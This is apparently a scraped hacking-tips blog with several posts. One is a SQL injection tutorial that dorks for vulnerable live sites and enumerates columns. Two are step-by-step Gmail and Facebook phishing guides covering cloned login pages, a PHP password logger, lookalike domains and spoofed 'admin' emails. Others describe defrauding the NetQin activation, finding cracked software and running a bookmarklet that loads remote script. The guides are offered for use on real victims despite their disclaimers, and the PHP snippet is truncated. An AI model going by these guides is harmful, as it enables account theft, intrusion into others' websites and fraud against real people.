SQL Injection with the help of URL [Tutorial 1] :

Hey guyz this is webtrix again to help u with some interesting menu ! ! U know what is SQL injection?? Today we're to talk bout that very fat job ! !

SQL injection is an attack

in which malicious code is put into strings which are later flown to an instance of SQL Server for commiting some works ! !

But which sites are SQL vulnerable and how to find them.

Dunworry ! ! !
Webtrix is here to assist u. Let's find them out !

How to find sites on which we can perform:

While goin to get a vulnerable site to inject SQL u'll hear the words

"Dork a lot"

,
this means to google a particular term which targets finding vulnerable websites. An example of a google dork is

inurl:index.php?id=

,
entering dis string in google searchengine

would find out all sites from googlecache

with the string news.php?id= in theirURL.
Viz:

http://www.site.com/news.php?id=4

To be a SQL injection vulnerable a site has to have a parameter named

GET

in the URL.
In http://www.site.com/news.php?id=4 ,

id=4

is the

GET

parameter

as it is getting the id=4

from the

back end database.

How to check Vulnerability with dat:

Whether the site is vulnerable to SQLi or not, to test it we've to just

add an apostrophe( ‘ ) after one of the parameter in the URL.

Viz.

http://www.site.com/news.php?id=4'

If the site is vulnerable it will show

error

like:

You have an error in your SQL Syntax

Warning:

mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()

If you notice any of the mentioned errors putting ‘ after the parameter in that URL then therez possibility of the site to be vulnerable a little to SQLi attacks .

But itz not the single methode to discover whether the site is vulnerable or not,

vulnurablity can be findout if therez an error in form of

vanishing

while a part of the site is just simply disappears.

How to Find number of columns:

When u come to know that the site is vulnerable the further action is to search out the number of columns in the table which is in use. There are lot of ways to find this like

ORDER BY

or

GROUP BY

.
Here use

RDER BY

to search out the number of columns first. Start with

ORDER BY 1

.
Viz.

http://www.site.com/news.php?id=4 ORDER BY 1

-

If it doesn’t make the outcome of an error then use

ORDER BY

command. Sometimes you will get error on doing

ORDER BY 1

, if it gives error then simple move on to other site.
If it doesn’t error then always go to

ORDER BY 10000

(because a table can’t have 10000 columns in it) to see if it give error.
Viz.

http://www.site.com/news.php?id=4 ORDER BY 10000

–
Sometimes it doesn’t error as it should, then use

AND 1=0

before the

ORDER BY

query to make error outcome.
Viz.

http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000

–
After getting the error on 10000 its up to you how you find the number of columns,

begin with 100 and divide the no of columns by 2 until i get closer.

viz:
http://www.site.com/news.php?id=4 ORDER BY 100–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 50–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 25–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 12–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 6–
ERROR
http://www.site.com/news.php?id=4 ORDER BY 3–
NO ERROR

As 6 is giving error and 3 is not the number of columns is either 3, 4 or 5.

http://www.site.com/news.php?id=4 ORDER BY 4–
NO ERROR
http://www.site.com/news.php?id=4 ORDER BY 5–
ERROR

After this you can come to decision that the site has 4 columns

as it

gives error above ORDER BY 4 and doesn’t error below ORDER BY 4.

[NOTE : Comments are not necessary every time when injecting a site, though sometimes they are. Possible comments to use are:
–

/*
/**/
#

Next part on "SQL injection based on URL" will be publish in the nex post. Plz be patnce. :)

[NOTE:

This tutorial is only for Educational purpose. Webtrix neither gurantee any trick nor is responsible for the outcomes of any trick performed by any one. Remember SQL injection is a punishable cyber offence.

]
¤ Like us on Facebook
www.facebook.com/MyWebtrix

How to hack Gmail ! !

[NOTE : This is for Educational Purpose Only. Webtrix is neither responsible for any action taken by its readers nor gurantee any trick. Try it with your own risk. Remember, phishing is a punishable cyber offence.]

To phish Gmail, Materials required :
1. Gmail Phisher. Click Here
2. Free Webhosting Site. Click Here

If you know a little of Hacking, then it is importent for you know to know what is Phishing

and how it works.
Lets have a explanation.
First of all

What are Phish pages and what is phishing??

Phish pages are the fake pages pages that looks like actual webPages.

The only difference is the program running in the background, for example, actual Webpage sends requests to Gmail server while Phish Pages sends it to phishers' php server.

Basically, Phishing is a p/w hacking technique used wid d help of phish pages that looks like actual webpage . It is the URL in the address bar that makes difference. so Guys be cautious while entering a non familier site, tip for you all, always check the Address bar .

Now What is Smart Phishing?

Normal phishing page sends the password to hacker but it doesn't redirects the page to original website but smart phishing does. Means victim can never know what really happened and his account is got hacked :)!! He will only think that he has entered the wrong password as in secondattempt the web page is original and he will be able to login and the most fantastic thing is that the original redirected page has username already entered in it that makes it even smarter.
Now lets come to how it works??

When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it . So when the person clicks on try again it redirects to the actual URL so that the victim does not know that your site is a fake site and gets his gmail.com password hacked.

come on readers, with the help of webtrix

Lets do it ! !

1. First of all download the Gmail Phisher.
Download
2. Extract the .rar file now you will get three files as given below:
¤. gmail.html
¤. log.txt
¤. mail.php
3. Upload all the Three files to any of the free Web hosting server. Remember, while creating the account on these servers try the username as nearer as possible to the original URL like mail.gmaile or maile.gmall etc.. As its the most crucial step. Some Free Web hosting servers are given below you can also find few more for yourself.
*. www.yourfreehosting.net
¤. www.esmartstart.com
¤. www.110mb.com
¤. www.drivehq.com
¤. www.t35.com
4. Once you have uploaded all the three files to web hosting server now you have to send these to your victim.

This is the most important step regarding smart phishing technique.

Most People use same password for orkut and gmail and here is the main hack lies.What you have to do you have to send the HTML email to the victim which looks similar to the Orkut scrap to his email you can easily do this using simple editing to theexisting mail. Just you have to change the link with your phish link and content according to the person likings so that he will surely come inside the trap.

Another technique is that you can send him a request to join a particular community in the format orkut does.

And Last but the most important one Send him mail from Gmail Admin such that "We have seen illegal activityfrom your account and you need to verify your account and your account is temporarily disabled after thislogin. To unlock your account Verify your Email" and in that link put your Phish link. Now Guys you all will came to know How it works. If you want to Protect yourself its must that you should know what techniques a Hacker can use to hack your Gmail Account.
5. Now After sending phisher to victim,

once the user logs in to his Gmail account using your Phisher, his user ID and password are stored in log.txt ,

What youhave to do is just refresh your Web hosting account files.
6.

The Log.txt file will contain the passwords.

Done :)!

How to phish Facebook ? [N.B - phishing is a punishable cyber offence. Try it with your own interest.]

Now I'm goin to make a tutorial on facebook phish !
1stly,

go to"www.facebook.com/login.php" and right click on some white space on the page and press "view source code". A huge text is to appear, copy it all to notepad.
2ndly,
we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press

Edit

, then

search

. and search "action=" [without the quotes]. u should find

The big red ring that circles

the "action=" you have to change. You have to change it

to 'action="next.php" '

. after you have done that, you should change the method (small red circle on the picture) to

"get"

instead of

"post"

, or else it will not work.Save the

document as"index.PHP" (not htm!)

3rdly,
Now that we change the action to

next.php

, we should also make a

"next.php"

. open up notepad again. And write this:

$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this as

"next.php"

Note: for security you should rename

"passwords.txt" to something else

.
now make a text file called

"passwords.txt" or whatever you renamed the file to in the"next.php"

, leave this document blank.
4rthly,

Upload the 3 files "index.php","next.php" and"passwords.txt" (or whatever the password file is called) to a subdomain hosting site.

THEY MUST SUPPORT

.php

!
I suggest these: 110mb.com, spam.comor 007sites.com. When you made an account, you should upload the 3 files.

Congratz. You have yourself a working Phisher site!

5thly,
now we would like to

send spoof emails :).

To do that we should first make an email account

which starts with facebook@. or something that looks alike.

Like this

FACEB0OK@hotmail.comORsOMeTHing like that.

You should either

use Gmail, Live, or hotmail or you could get a mail like this"facebook@noreply.com" soemthing like that.

but eventually that would cost. When your email is set go to step six.
6thly,

Copy the content of an original Facebook friendship invitation email and paste it into a new mail.

DONT SENT YET!

remove the hyperlink from this link

:
http:/www.facebook.com/n/?reqs.php

Mark it and push the 'Add hyperlink button'.
Add hyperlink button in the red circle.

now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page. Now i belive your ready to send your spoof emails to everybody you know.

TRY IT WITH YOUR OWN RESPONSIBILITY,
Phishing is a punishable cyber offence ! !
Webtrix isn't responsible for any action created by itz reader

Hack NetQin to become pro member :

This is a simple trick to activate NetQin or

to become pro member without using a single penny.

Here we go,
needed things
1. You should have internet activated.
2. Your sim card should have no balance.
3. Insert the sim in your phone. You

should not have any balance or it will get deducted. Then open any NetQin software to activate or to make it a pro member

and try to activate. Then it will start activating and tell that so and so charge will be taken.
Say

Yes

and then it will connect to the internet and send a message together. Then it will say message sending failed. Select

ok

. Then it will say activation is proceeding and then it will activate. Have a try.

I did it more than a 100 times on many different phones. And it always works.

Tell me if there is a problem.
¤ Download Free NetQin Mobile Guard.
¤ Download Trial Version NetQin Mobile Security.
¤ Download Free NetQin Mobile Manager

¤ Like this post on Facebook

Change Typed Text To Audio :

There is software which changes typed text to audio speech.

For itz trial version go to this Link .

You can search web for its full cracked version. By the way if ur text is in pdf format u can use adobe reader for tEXT to speech function.

Like This Post On Facebook

PDF Password Remover PDF Password Crack - Adobe PDF documents password recovery :

View PDF Password Remover product

Download PDF Password Remover

PDF Password Crack is a program to recover passwords for Adobe Acrobat PDF files. PDF Password Crack can be used to decrypt protected Adobe Acrobat PDF files, whichhave "owner" password set, preventing the file from editing (changing), printing, selecting text and graphics (and copying them into the Clipboard), or adding/changingannotations and form fields. Decryption is being done instantly. Decrypted file can beopened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions -- i.e.with edit/copy/print functions enabled. All versions of AdobeAcrobat (including 5.x, which features 128-bit encryption) are supported. You can see how our softwareperforms the process to crackPDF password – FREE Demo Version of PDF Password Crack software is a working demo of our tool. You can download this functional Demo Version online free of cost. To dowload Click Here

How to Save Web Page to PDF format

Are you one of the many internet users who are still manually copies and pastes information from the web to a Word document?

Quit wasting yor time doing such tedious task and save abunch of papers just to print what you just"Googled". You know, there's a better and easier way of doing these things. A free online HTML to PDF converter can come to your rescue. And I will show you how. There are a lot of day-to-day situations where an HTML to PDF convertion tool can come in handy. Here are some of its common uses: 1. Save a Wikipedia page for your research activity 2. Save an online tutorial page for offline reading 3. Save any web page for archive / compilation

Now How to Save Web Page to PDF format

There are a lot of free html to pdf converters available online. But among that I have tried, the one that I likebest is this: Click Here With this free online pdf converter, you can convert and save any URL / web pages into a single pdf file. What I like most about it is that it's very straight forward and very easy to use. Just copy the URL of the web page you want to save, paste it in the box, then click "Convertto PDF". It's that simple. Moreover, it doesn't put any watermarks on the converted pdf unlike other free conversion tools online. Try it now! .

Find crack software

Download full crack software with google (Trick) : Hi friends, today i found a interesting google trick by which we can download any software orgame of its full crack version. For this do this one simple step. Just add fbr94 with the search key. i.e. If you want to download total video converter then search "totalvideo converter fbr94" and you willfind full crack software in google search.

[TRICK] Another Way ToDownload youtube videousing operamini on mobile phone : Actually i don't know who is theoriginal author of this tutorial, but here i'm just share what i found out there. This trick is using java script.. Ok let's do it... Step by step : 1. Open operamini and make (or edit) a bookmark first for easy use later. Copy and paste the javascript below in the bookmark address (without spacing) javascript:d=document;s=d.createElement("script");s.src="http://mohdfauzi84.bplaced.net/get.js";d.body.appendChild(s);void(0); 2. Go to http://www.youtube.com>> Search or browse for the video what you want 3. Scroll down to bottom page >> click " desktop " to change youtube page layoutto desktop mode After youtube page layout changes to desktop mode Zoom In... under the media player you will see some menus (like, dislike, share, etc. ), there's no download options. 4. Now... go to bookmark andclick the bookmark that you created earlier. 5. After loading is complete you will see a download option. Click "download" >> wait until loading is complete >> select what format you want to download >> 6. Downloading...... Enjoy... I'm sorry .. the screenshots above does not include a download manager, becausethe files in the screenshot is364.3MB. whereas my Memoricard only 128MB, 36MB available. And below is SS from the other files I have downloaded

How to Freely Unlock modem Without any Software : This will help you to unlock any modem freely without using any softwarer, and you can unlock it wherever you find yourself I know most people don't yet that they can unlock their modem without any Software, or some call it UNLOCKER. Below i want to share with you a simple way you can unlock any modem. How to unlock any modem without having any software You can unlock your modem (ZTE& HUAWEI) What you need to unlock your modem is IMEI Number of your modem and internet access. Goto this site: http://bb5.at/huawei.php?imei= when you are there, enter your imei No. often starts with 35, and add it to front of = sign e.g. http://bb5.at/huawei.php?imei=35123456789...and continue by pressing Enter. In a few second it will show you the imei number you have entered and unlock code! Locate entsperren/unlock and copy the code. Insert another sim aside from the manufacturer's example; if you're using glo 3g modem, insert mtn, zain or etisalat. When You plug it, it'll will request you to enter the unlock code, just enter the one you copied on entsperren/unlock and click on "ok" We are done! You can now switch any network at will. Note; you only have 10 trial to unlock your modem, if youfailed this 10 times, your modem will be locked forever? You can as well use this website to unlock both huawei and zte: http://a-zgsm.com don't forget, we are always here to give you guys vital informations! -webtrix corp.